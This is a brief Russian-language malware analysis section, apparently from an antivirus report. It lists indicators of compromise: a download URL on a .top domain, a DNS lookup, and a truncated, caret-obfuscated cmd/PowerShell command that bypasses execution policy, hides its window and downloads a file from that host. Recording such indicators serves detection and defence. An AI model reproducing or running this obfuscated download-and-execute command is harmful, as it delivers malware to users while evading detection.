Техническая информация
- http://zussipussicscds.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oWerSHeLl^.E^X^E^ ^-exeC^UtIo^NpolicY byPaSS -^No^p^R^o^FIlE^ -WinD^OwS^TyLe^ hIdd^e^N (^nEw-Ob^Je^C^t ^s^YSte^m^.NeT^.W^eBC^Lie^N^t)^.DO^w^NLo^AD^fI^le^('http://zussipussi...
- DNS ASK zu####ussicscds.top
- '<SYSTEM32>\cmd.exe' /c "p^oWerSHeLl^.E^X^E^ ^-exeC^UtIo^NpolicY byPaSS -^No^p^R^o^FIlE^ -WinD^OwS^TyLe^ hIdd^e^N (^nEw-Ob^Je^C^t ^s^YSte^m^.NeT^.W^eBC^Lie^N^t)^.DO^w^NLo^AD^fI^le^('http://zussipussi...' (со скрытым окном)